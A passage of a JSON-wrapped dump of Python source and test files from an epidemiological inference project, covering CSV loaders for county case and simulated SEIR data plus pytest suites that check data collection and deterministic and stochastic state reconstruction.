os.path.exists(filename):\n print(\"MISSING FILE: \"+filename)\n print(\" Experiment \"+str(expnum))\n print(\" Trial \"+str(trial))\n print(\" County \"+county)\n return [], [], None\n\n df = pd.read_csv(filename) \n tmp = df.loc[ df['cumI'] >= threshold, ['cumI'] ]\n cumI = tmp['cumI'].tolist()\n index = list(range(len(cumI)))\n\n #\n # TODO - raise warning if both start/stop and days_after_first are specified\n #\n try:\n istart = cumI.index(next(filter(lambda x: x>0, cumI)))\n if not days_after_first is None:\n stop = min(len(cumI), istart + days_after_first)\n if not days_before_first is None:\n start = max(0, istart - days_before_first)\n except StopIteration:\n print(\"WARNING: no infections reported in the data. Ignoring days_after_first and days_before_first options.\")\n if stop is None or stop >= len(cumI):\n if start > 0:\n cumI = cumI[start:]\n index = index[start:]\n else:\n if start > 0:\n cumI = cumI[start:stop]\n index = index[start:stop]\n else:\n cumI = cumI[:stop]\n index = index[:stop]\n\n filename=os.path.join(expdir, 'exp'+str(expnum), \"README.txt\")\n with open(filename, \"r\") as INPUT:\n INPUT.readline()\n INPUT.readline()\n INPUT.readline()\n line = INPUT.readline()\n beta = line.strip().split(\" \")[2]\n line = INPUT.readline()\n line.strip()\n gamma = line.strip().split(\" \")[1]\n line = INPUT.readline()\n line.strip()\n sigma = line.strip().split(\" \")[1]\n return index, cumI, {'beta':beta, 'gamma':gamma, 'sigma':sigma}\n\"\"\"\n\n#\n# Load data files into a pandas dataframe\n#\ndef load_data(files, index_col=0, names=None, dtype=None, header=0, labels=None):\n if labels is None:\n labels = list(range(len(files)))\n if len(files) == 1:\n DF = pd.read_csv(files[0], header=header, dtype={\"FIPS\":'str'}, encoding=\"ISO-8859-1\")\n DF = DF.set_index(index_col)\n df = DF[names]\n df.index = df.index.rename('Date')\n if dtype == 'casedata':\n label = str(DF[\"FIPS\"][0])\n if len(label) < 5:\n label = \"0\"*(5-len(label))+label\n df = df.rename(columns={names[0]:label})\n else:\n label = str(labels[0])\n return df.rename(columns={names[0]:label})\n else:\n dfs = []\n i = 0\n for fname in files:\n DF = pd.read_csv(fname, header=header, dtype={\"FIPS\":'str'}, encoding=\"ISO-8859-1\")\n DF = DF.set_index(index_col)\n df = DF[names]\n if dtype == \"casedata\":\n label = str(DF[\"FIPS\"][0])\n if len(label) < 5:\n label = \"0\"*(5-len(label))+label\n else:\n label = str(labels[i])\n df = df.rename(columns={names[0]:label})\n df.index = df.index.rename('Date')\n dfs.append(df)\n i = i+1\n dfall = pd.concat(dfs, axis=1)\n dfall.index = dfall.index.rename('Date')\n return dfall\n \n\n#\n# Load data for one or more trials into a dataframe\n#\ndef load_df_expdata(expdir=None, expnum=1, trial=None, county=\"24031\", start=0, stop=None, days_before_first=None, days_after_first=None):\n #\n # load data\n #\n countycsvfiles = list(glob.glob(os.path.join(expdir, 'exp'+str(expnum), \"*_\"+county+\"*.csv\")))\n countycsvfiles.sort()\n if len(countycsvfiles) == 0: # pragma: no cover\n print(\"ERROR: no experimental files available for county '%s' in directory '%s'\" % (county, os.path.join(expdir, 'exp'+str(expnum))))\n return None, None\n if trial is None:\n df = load_data(countycsvfiles, dtype='seir', index_col='time', names=['cumI'])\n else:\n try:\n files = [countycsvfiles[trial]]\n except Exception as exc: # pragma: no cover\n print(\"ERROR: bad trial id '%s'\" % str(trial))\n print(exc)\n return None, None\n df = load_data(files, dtype='seir', index_col='time', names=['cumI'], labels=[trial])\n #print(df.head())\n #\n # filter data\n #\n cumI = df.sum(axis=1)\n #print(cumI)\n cumI = cumI.tolist()\n\n #\n # TODO - raise warning if both start/stop and days_after_first are specified\n #\n try:\n istart = cumI.index(next(filter(lambda x: x>0, cumI)))\n if not days_after_first is None:\n stop = min(len(cumI), istart + days_after_first+1)\n if not days_before_first is None:\n start = max(0, istart - days_before_first)\n except StopIteration: # pragma: no cover\n print(\"WARNING: no infections reported in the data. Ignoring days_after_first and days_before_first options.\")\n if stop is None or stop >= len(cumI):\n if start > 0:\n df = df.iloc[start:,]\n else:\n if start > 0:\n df = df.iloc[start:stop,]\n else:\n df = df.iloc[:stop,]\n\n filename=os.path.join(expdir, 'exp'+str(expnum), \"README.txt\")\n if os.path.exists(filename):\n with open(filename, \"r\") as INPUT:\n INPUT.readline()\n INPUT.readline()\n INPUT.readline()\n line = INPUT.readline()\n beta = line.strip().split(\" \")[2]\n line = INPUT.readline()\n line.strip()\n gamma = line.strip().split(\" \")[1]\n line = INPUT.readline()\n line.strip()\n sigma = line.strip().split(\" \")[1]\n R0 = str(float(beta)/float(gamma))\n else:\n modulepath=os.path.join(expdir, 'exp'+str(expnum))\n sys.path.insert(0, modulepath)\n importlib.invalidate_caches()\n module = importlib.import_module('info')\n module = importlib.reload(module)\n sys.path.pop(0)\n beta = str(module.beta)\n gamma = str(module.gamma)\n R0 = str(module.R0)\n sigma = str(module.sigma)\n return df, {'beta':float(beta), 'R0':float(R0), 'gamma':float(gamma), 'sigma':float(sigma)}\n\n\n#\n# Load data for one or more trials into a dataframe\n#\ndef load_df_casedata(files, datadir=None, datacol=None, start=0, stop=None, days_before_first=None, days_after_first=None):\n if datacol is None:\n datacol='Confirmed'\n #\n # load data\n #\n files.sort()\n if len(files) == 0: # pragma: no cover\n print(\"ERROR: no case data files were specified\")\n return None\n files_with_path = []\n for f in files:\n fname = os.path.join(datadir, f)\n if not os.path.exists(fname): # pragma: no cover\n print(\"ERROR: missing file '%s' in directory '%s'\" % (f, datadir))\n return None\n files_with_path.append(fname)\n df = load_data(files_with_path, dtype='casedata', index_col=\"Date\", names=[datacol])\n #\n # filter data\n #\n cumI = df.sum(axis=1)\n #print(cumI)\n cumI = cumI.tolist()\n\n #\n # TODO - raise warning if both start/stop and days_after_first are specified\n #\n try:\n istart = cumI.index(next(filter(lambda x: x>0, cumI)))\n if not days_after_first is None:\n stop = min(len(cumI), istart + days_after_first+1)\n if not days_before_first is None:\n start = max(0, istart - days_before_first)\n except StopIteration: # pragma: no cover\n print(\"WARNING: no infections reported in the data. Ignoring days_after_first and days_before_first options.\")\n if stop is None or stop >= len(cumI):\n if start > 0:\n df = df.iloc[start:,]\n else:\n if start > 0:\n df = df.iloc[start:stop,]\n else:\n df = df.iloc[:stop,]\n return df\n\n" }, { "alpha_fraction": 0.6027931571006775, "alphanum_fraction": 0.6455124020576477, "avg_line_length": 47.689998626708984, "blob_id": "7805bf1617a3500443705af7b5f83ba2a36d78a2", "content_id": "66969d7aece5cb2f2b49b246a51c174bae88123a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4869, "license_type": "no_license", "max_line_length": 154, "num_lines": 100, "path": "/epi_inference/collect/tests/test_collect_workflows.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport shutil\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.util import compare_csv\nfrom epi_inference.engine import driver\n\n\nclass TestCollect():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_collect_exp(self):\n # run a collection of data for 24031\n args = Options()\n args.block = 'collect'\n args.config_file = './config_files/collect_exp.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/expdata3_1_all.csv', './baseline/expdata3_1_all.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_2_all.csv', './baseline/expdata3_2_all.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_3_all.csv', './baseline/expdata3_3_all.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_1_7before.csv', './baseline/expdata3_1_7before.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_1_15after.csv', './baseline/expdata3_1_15after.csv', index_col='Date')\n assert outputdf.shape[0] == 17\n compare_csv('./output/expdata3_1_7before_15after.csv', './baseline/expdata3_1_7before_15after.csv', index_col='Date')\n \n outputdf, golddf = compare_csv('./output/expdata3_1_col3_7before.csv', './baseline/expdata3_1_col3_7before.csv', index_col='Date')\n assert outputdf.shape[0] == 120\n outputdf, golddf = compare_csv('./output/expdata3_1_col3_15after.csv', './baseline/expdata3_1_col3_15after.csv', index_col='Date')\n assert outputdf.shape[0] == 26\n outputdf, golddf = compare_csv('./output/expdata3_1_col3_7before_15after.csv', './baseline/expdata3_1_col3_7before_15after.csv', index_col='Date')\n assert outputdf.shape[0] == 23\n \n # cleanup the files we created\n os.remove('./output/expdata3_1_all.csv')\n os.remove('./output/expdata3_1_all_meta.yml')\n os.remove('./output/expdata3_1_all_geodata.csv')\n os.remove('./output/expdata3_2_all.csv')\n os.remove('./output/expdata3_2_all_meta.yml')\n os.remove('./output/expdata3_2_all_geodata.csv')\n os.remove('./output/expdata3_3_all.csv')\n os.remove('./output/expdata3_3_all_meta.yml')\n os.remove('./output/expdata3_3_all_geodata.csv')\n os.remove('./output/expdata3_1_7before.csv')\n os.remove('./output/expdata3_1_7before_meta.yml')\n os.remove('./output/expdata3_1_7before_geodata.csv')\n os.remove('./output/expdata3_1_15after.csv')\n os.remove('./output/expdata3_1_15after_meta.yml')\n os.remove('./output/expdata3_1_15after_geodata.csv')\n os.remove('./output/expdata3_1_7before_15after.csv')\n os.remove('./output/expdata3_1_7before_15after_meta.yml')\n os.remove('./output/expdata3_1_7before_15after_geodata.csv')\n os.remove('./output/expdata3_1_col3_7before.csv')\n os.remove('./output/expdata3_1_col3_7before_meta.yml')\n os.remove('./output/expdata3_1_col3_7before_geodata.csv')\n os.remove('./output/expdata3_1_col3_15after.csv')\n os.remove('./output/expdata3_1_col3_15after_meta.yml')\n os.remove('./output/expdata3_1_col3_15after_geodata.csv')\n os.remove('./output/expdata3_1_col3_7before_15after.csv')\n os.remove('./output/expdata3_1_col3_7before_15after_meta.yml')\n os.remove('./output/expdata3_1_col3_7before_15after_geodata.csv')\n \n # check that we cleaned everything up\n #files_remaining = [f for f in os.listdir('./output')]\n #assert len(files_remaining) == 0\n \n def test_collect_case(self):\n args = Options()\n args.block = 'collect'\n args.config_file = './config_files/collect_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/countydata1_FL.csv', './baseline/countydata1_FL.csv', index_col='Date')\n assert outputdf.shape[0] == 40\n\n os.remove('./output/countydata1_FL.csv')\n os.remove('./output/countydata1_FL_meta.yml')\n\n # check that we cleaned everything up\n #files_remaining = [f for f in os.listdir('./output')]\n #assert len(files_remaining) == 0\n" }, { "alpha_fraction": 0.5760652422904968, "alphanum_fraction": 0.5977146029472351, "avg_line_length": 46.55155563354492, "blob_id": "92f2c76f2b35f21fc9a133d618f3080a5d226265", "content_id": "86fd3b451a225c2d244617b1b2cd2d899b411975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29054, "license_type": "no_license", "max_line_length": 147, "num_lines": 611, "path": "/epi_inference/reconstruction/tests/test_reconstruction.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport pandas as pd\npd.set_option(\"display.max_rows\", None)\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport epi_inference.reconstruction.common as rcommon\nimport epi_inference.reconstruction.deterministic as recond\nimport epi_inference.reconstruction.stochastic as recons\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\nimport matplotlib.pyplot as plt\n\n\"\"\"\ndef test_force_keyword_args():\n @force_keyword_args\n def func(a,b):\n return '{}{}'.format(a,b)\n\n ans = func(a='A', b='B')\n assert ans == 'AB'\n\n with pytest.Raises(SyntaxError):\n func('A','B')\n\"\"\"\n\n#ToDo: switch the np stochastic reconstruction test to use simulated data from pipeline with our reporting model\n\ndef test_reported_cases_from_cumulative():\n # test handling of all zeros and that dates are correct\n dates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=4).to_pydatetime().tolist()\n assert dates[0] == datetime(year=2020, month=4, day=9)\n \n cc = [0, 0, 0, 0] \n reported_cases_per_day \\\n = rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n \n assert len(reported_cases_per_day.values) == len(cc)-1\n assert len(reported_cases_per_day.values) == 3\n assert len(reported_cases_per_day.dates) == len(dates)-1\n assert len(reported_cases_per_day.dates) == 3\n assert all(r == 0 for r in reported_cases_per_day.values)\n assert reported_cases_per_day.dates[0] == datetime(year=2020, month=4, day=10)\n expected_rc = [0, 0, 0]\n assert all([r == er for r, er in zip(reported_cases_per_day.values, expected_rc)])\n\n # test that we obtain expected numbers\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=7).to_pydatetime().tolist()\n assert dates[0] == datetime(year=2020, month=3, day=28)\n cc = [0, 1, 2, 3, 3, 3, 5]\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n assert len(reported_cases_per_day.dates) == 6\n assert len(reported_cases_per_day.values) == 6\n expected_rc = [1, 1, 1, 0, 0, 2]\n assert all([r == er for r,er in zip(reported_cases_per_day.values, expected_rc)])\n assert reported_cases_per_day.dates[0] == datetime(year=2020, month=3, day=29)\n assert reported_cases_per_day.dates[-1] == datetime(year=2020, month=4, day=3)\n\n # test that we throw an error if dates are not the same length as cumulative reported cases\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=5).to_pydatetime().tolist()\n cc = [0, 1, 2, 3, 3, 3, 5]\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n\n # test that we throw an error if cumulative reported cases does\n # not start at zero\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=4).to_pydatetime().tolist()\n cc = [4, 5, 6, 7]\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n\n # that that we throw an error if cumulative cases are non-increasing\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=5).to_pydatetime().tolist()\n cc = [0, 1, 2, 1, 5]\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n\ndef test_df_reported_cases_from_cumulative():\n # test handling of all zeros and that dates are correct\n dates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=4).to_pydatetime().tolist()\n assert dates[0] == datetime(year=2020, month=4, day=9)\n\n counties = ['12001', '12002', '12003']\n\n cumulative_reported_cases = dict()\n for i,c in enumerate(counties):\n cumulative_reported_cases[c] = [i*j for j in range(4)]\n\n cumulative_reported_cases['date'] = dates\n df_cumulative_reported_cases = pd.DataFrame(cumulative_reported_cases)\n\n df_reported_cases = rcommon.df_reported_cases_from_cumulative(df_cumulative_reported_cases)\n\n # test that we obtain the expected numbers\n reported_cases = dict()\n reported_cases['date'] = dates[1:]\n for i,c in enumerate(counties):\n reported_cases[c] = [i for j in range(3)]\n df_expected_reported_cases = pd.DataFrame(reported_cases).set_index('date')\n pd.testing.assert_frame_equal(df_reported_cases, df_expected_reported_cases.astype(float))\n\n # test that we throw an error if cumulative reported cases does\n # not start at zero\n cumulative_reported_cases = dict()\n for i,c in enumerate(['12001', '12002', '12003']):\n cumulative_reported_cases[c] = [i*j+1 for j in range(4)]\n\n cumulative_reported_cases['date'] = dates\n df_cumulative_reported_cases = pd.DataFrame(cumulative_reported_cases)\n\n with pytest.raises(ValueError):\n df_reported_cases = rcommon.df_reported_cases_from_cumulative(df_cumulative_reported_cases)\n\n # test that we throw an error if cumulative reported have decreasing\n # numbers\n cumulative_reported_cases = dict()\n for i,c in enumerate(['12001', '12002', '12003']):\n cumulative_reported_cases[c] = [i*j for j in range(4)]\n cumulative_reported_cases['12003'][2]=1\n\n cumulative_reported_cases['date'] = dates\n df_cumulative_reported_cases = pd.DataFrame(cumulative_reported_cases)\n\n with pytest.raises(ValueError):\n df_reported_cases = rcommon.df_reported_cases_from_cumulative(df_cumulative_reported_cases)\n\n \"\"\"\n # test that we throw an error if dates are not the same length as cumulative reported cases\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=5).to_pydatetime().tolist()\n cc = [0, 1, 2, 3, 3, 3, 5]\n with pytest.raises(ValueError):\n rdates, rc = rcommon.reported_cases_from_cumulative(dates, cc)\n \"\"\"\n\ndef test_np_reported_cases_from_cumulative():\n # test handling of all zeros and that dates are correct\n dates = np.arange(datetime(2020,1,1), datetime(2020,1,5), timedelta(days=1)).astype(datetime)\n counties = np.asarray(['12001', '12002', '12003']).astype(object)\n\n cumulative_reported_cases = np.zeros((len(dates), len(counties)))\n for i,c in enumerate(counties):\n cumulative_reported_cases[:,i] = np.asarray([i*j for j in range(4)])\n\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n \n # test that we obtain the expected numbers\n np.testing.assert_array_equal(reported_cases_per_day.dates,dates[1:])\n np.testing.assert_array_equal(reported_cases_per_day.counties,counties)\n np_expected_reported_cases = np.zeros((len(reported_cases_per_day.dates), len(counties)))\n for i,c in enumerate(counties):\n np_expected_reported_cases[:,i] = np.asarray([i for j in range(3)])\n np.testing.assert_array_equal(reported_cases_per_day.values, np_expected_reported_cases)\n\n # test that we throw an error if dates are not the same length as cumulative reported cases\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates[2:],\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n # test that we throw an error if cumulative reported cases do\n # not start at zero\n cumulative_reported_cases = np.zeros((len(dates), len(counties)))\n for i,c in enumerate(counties):\n cumulative_reported_cases[:,i] = np.asarray([i*j+1 for j in range(4)])\n\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates[2:],\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n # test that we throw an error if cumulative reported have decreasing\n # numbers\n cumulative_reported_cases = np.zeros((len(dates), len(counties)))\n for i,c in enumerate(counties):\n cumulative_reported_cases[:,i] = np.asarray([i*j for j in range(4)])\n cumulative_reported_cases[2,2]=1\n\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\ndef test_transmissions_from_reported_cases():\n # run a simulation and test that we recover the transmission\n # vector from the cumulative reported cases\n N = 1000\n y0={'S': N, 'E': 5, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n reporting_factor = 8\n report_delay = 7\n tf=100\n \n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, N, report_delay, tx=None)\n SEIIIR = sim.SEIIIR\n\n reported_cases_per_day = rcommon.reported_cases_from_cumulative(dates=sim.cumulative_reported_cases.dates,\n cumulative_reported_cases=sim.cumulative_reported_cases.values\n )\n\n assert len(reported_cases_per_day.dates) == len(sim.cumulative_reported_cases.dates)-1\n assert len(reported_cases_per_day.dates) == len(sim.SEIIIR.dates)\n assert len(reported_cases_per_day.values) == len(sim.cumulative_reported_cases.values)-1\n \n transmissions = recond._transmissions_from_reported_cases(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n assert len(transmissions.dates) == len(reported_cases_per_day.dates)\n assert len(transmissions.values) == len(reported_cases_per_day.values)\n \n np.testing.assert_allclose(np.asarray(SEIIIR.transmissions), np.asarray(transmissions.values))\n for i in range(len(transmissions.dates)):\n assert transmissions.dates[i] == SEIIIR.dates[i]\n\ndef test_np_deterministic():\n # run some simulations and test that we recover the transmissions\n # from the cumulative reported cases\n N = 1000\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n reporting_factor = 8\n report_delay = 7\n tf=100\n tx=[0]*tf\n tx[30]=1\n\n counties = np.asarray(['12001', '12002', '12003'], dtype=np.object)\n populations = np.zeros(len(counties))\n cumulative_reported_cases = np.zeros((tf+1,len(counties)))\n simT = np.zeros((tf,len(counties)))\n simS = np.zeros((tf,len(counties)))\n simE = np.zeros((tf,len(counties)))\n simI1 = np.zeros((tf,len(counties)))\n simI2 = np.zeros((tf,len(counties)))\n simI3 = np.zeros((tf,len(counties)))\n simR = np.zeros((tf,len(counties)))\n for i,c in enumerate(counties):\n y0={'S': N*(i+1), 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n populations[i] = N*(i+1)\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, populations[i], report_delay, tx=tx)\n cumulative_reported_cases[:,i] = sim.cumulative_reported_cases.values\n simT[:,i] = sim.SEIIIR.transmissions\n simS[:,i] = sim.SEIIIR.S\n simE[:,i] = sim.SEIIIR.E\n simI1[:,i] = sim.SEIIIR.I1\n simI2[:,i] = sim.SEIIIR.I2\n simI3[:,i] = sim.SEIIIR.I3\n simR[:,i] = sim.SEIIIR.R\n cumulative_reported_cases_dates = np.asarray(sim.cumulative_reported_cases.dates)\n dates = np.asarray(sim.SEIIIR.dates)\n\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=cumulative_reported_cases_dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n assert len(reported_cases_per_day.dates) == len(cumulative_reported_cases_dates)-1\n assert len(reported_cases_per_day.dates) == len(dates)\n assert len(reported_cases_per_day.values) == len(dates)\n np.testing.assert_array_equal(reported_cases_per_day.dates, cumulative_reported_cases_dates[1:])\n np.testing.assert_array_equal(reported_cases_per_day.counties, counties)\n\n ### test the intermediate method\n transmissions = recond._np_transmissions_from_reported_cases(dates=reported_cases_per_day.dates,\n counties=reported_cases_per_day.counties,\n reported_cases_per_day=reported_cases_per_day.values,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n assert len(transmissions.dates) == len(reported_cases_per_day.dates)\n assert reported_cases_per_day.values.shape == transmissions.values.shape\n \n np.testing.assert_allclose(simT, transmissions.values)\n np.testing.assert_array_equal(transmissions.dates, dates)\n\n ### test the reconstruction\n recon = recond.np_reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n counties=reported_cases_per_day.counties,\n reported_cases_per_day=reported_cases_per_day.values,\n populations=populations,\n sigma=sigma,\n gamma=gamma,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n np.testing.assert_array_equal(dates, recon.dates)\n np.testing.assert_array_almost_equal(simS,recon.S)\n np.testing.assert_array_almost_equal(simE,recon.E)\n np.testing.assert_array_almost_equal(simI1,recon.I1)\n np.testing.assert_array_almost_equal(simI2,recon.I2)\n np.testing.assert_array_almost_equal(simI3,recon.I3)\n np.testing.assert_array_almost_equal(simR,recon.R)\n\ndef test_reconstruct_states_deterministic_decay():\n # run a simulation and test that we reconstruct the states\n # from the cumulative reported cases\n N = 1000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n reporting_factor = 8\n report_delay = 7\n tf=100\n tx=[0]*tf\n tx[10] = 1\n \n # run the simulation\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, N, report_delay, tx=tx)\n SEIIIR = sim.SEIIIR\n\n # reconstruct the states\n reported_cases_per_day = rcommon.reported_cases_from_cumulative(dates=sim.cumulative_reported_cases.dates,\n cumulative_reported_cases=sim.cumulative_reported_cases.values)\n \n recon = recond.reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n population=N, sigma=sigma,\n gamma=gamma, reporting_factor=reporting_factor,\n report_delay=report_delay)\n\n assert len(reported_cases_per_day.dates) == len(sim.SEIIIR.dates)\n assert len(recon.dates) == len(sim.SEIIIR.dates)\n assert len(reported_cases_per_day.values) == len(sim.SEIIIR.dates)\n assert len(recon.transmissions) == len(sim.SEIIIR.transmissions)\n assert len(recon.S) == len(SEIIIR.S)\n assert len(recon.E) == len(SEIIIR.E)\n assert len(recon.I1) == len(SEIIIR.I1)\n assert len(recon.I2) == len(SEIIIR.I2)\n assert len(recon.I3) == len(SEIIIR.I3)\n assert len(recon.R) == len(SEIIIR.R)\n\n np.testing.assert_allclose(np.asarray(SEIIIR.transmissions), np.asarray(recon.transmissions))\n np.testing.assert_allclose(np.asarray(SEIIIR.S), np.asarray(recon.S))\n np.testing.assert_allclose(np.asarray(SEIIIR.E), np.asarray(recon.E))\n np.testing.assert_allclose(np.asarray(SEIIIR.I1), np.asarray(recon.I1))\n np.testing.assert_allclose(np.asarray(SEIIIR.I2), np.asarray(recon.I2))\n np.testing.assert_allclose(np.asarray(SEIIIR.I3), np.asarray(recon.I3))\n np.testing.assert_allclose(np.asarray(SEIIIR.R), np.asarray(recon.R))\n\n for i in range(len(recon.dates)):\n assert recon.dates[i] == SEIIIR.dates[i]\n\n for i in range(len(reported_cases_per_day.dates)):\n assert reported_cases_per_day.dates[i] == sim.cumulative_reported_cases.dates[i+1]\n\ndef test_stochastic_reconstruction():\n # run a simulation and test that we reconstruct the states\n # from the cumulative reported cases\n N = 1000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n reporting_factor = 10\n report_delay = 8\n tf=100\n tx=[0]*tf\n tx[10] = 1\n \n # run the simulation\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, N, report_delay, tx=tx)\n\n # reconstruct the states\n dfT = None\n dfS = None\n dfE = None\n dfI1 = None\n dfI2 = None\n dfI3 = None\n dfR = None\n np.random.seed(1975)\n for real in range(50):\n reported_cases_per_day = rcommon.reported_cases_from_cumulative(dates=sim.cumulative_reported_cases.dates,\n cumulative_reported_cases=sim.cumulative_reported_cases.values)\n\n recon = recons.stochastic_reconstruction(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values, \n population=N,\n n_steps_per_day=4,\n reporting_delay_mean=8,\n reporting_delay_dev=1.35,\n reporting_multiplier=reporting_factor,\n fixed_incubation=5.2,\n infectious_lower=2.6,\n infectious_upper=6.0)\n\n if dfT is None:\n dfT = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfS = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfE = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfI1 = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfI2 = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfI3 = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfR = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n\n dfT['{}'.format(real)] = recon.transmissions\n dfS['{}'.format(real)] = recon.S\n dfE['{}'.format(real)] = recon.E\n dfI1['{}'.format(real)] = recon.I1\n dfI2['{}'.format(real)] = recon.I2\n dfI3['{}'.format(real)] = recon.I3\n dfR['{}'.format(real)] = recon.R\n\n dfsimT = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.transmissions}).set_index('dates')\n assert_if_mean_significantly_different(dfT, dfsimT, 4, 0.2)\n dfsimS = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.S}).set_index('dates')\n assert_if_mean_significantly_different(dfS, dfsimS, 4, 0.25)\n dfsimE = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.E}).set_index('dates')\n assert_if_mean_significantly_different(dfE, dfsimE, 4, 0.2)\n dfsimI1 = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.I1}).set_index('dates')\n assert_if_mean_significantly_different(dfI1, dfsimI1, 4, 0.2)\n dfsimI2 = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.I2}).set_index('dates')\n assert_if_mean_significantly_different(dfI2, dfsimI2, 4, 0.2)\n dfsimI3 = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.I3}).set_index('dates')\n assert_if_mean_significantly_different(dfI3, dfsimI3, 4, 0.2)\n dfsimR = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.R}).set_index('dates')\n assert_if_mean_significantly_different(dfR, dfsimR, 4, 0.2)\n\n@pytest.mark.skip('Not updating numpy version for now')\ndef test_np_stochastic_reconstruction():\n # run a simulation and test that we reconstruct the states\n # from the cumulative reported cases\n N = 10000\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n reporting_factor = 10\n report_delay = 8\n tf=100\n tx=[0]*tf\n tx[10] = 1\n\n counties = np.asarray(['12001', '12002', '12003'], dtype=np.object)\n #counties = np.asarray(['12001'], dtype=np.object)\n populations = np.zeros(len(counties))\n cumulative_reported_cases = np.zeros((tf+1,len(counties)))\n simT = np.zeros((tf,len(counties)))\n simS = np.zeros((tf,len(counties)))\n simE = np.zeros((tf,len(counties)))\n simI1 = np.zeros((tf,len(counties)))\n simI2 = np.zeros((tf,len(counties)))\n simI3 = np.zeros((tf,len(counties)))\n simR = np.zeros((tf,len(counties)))\n for 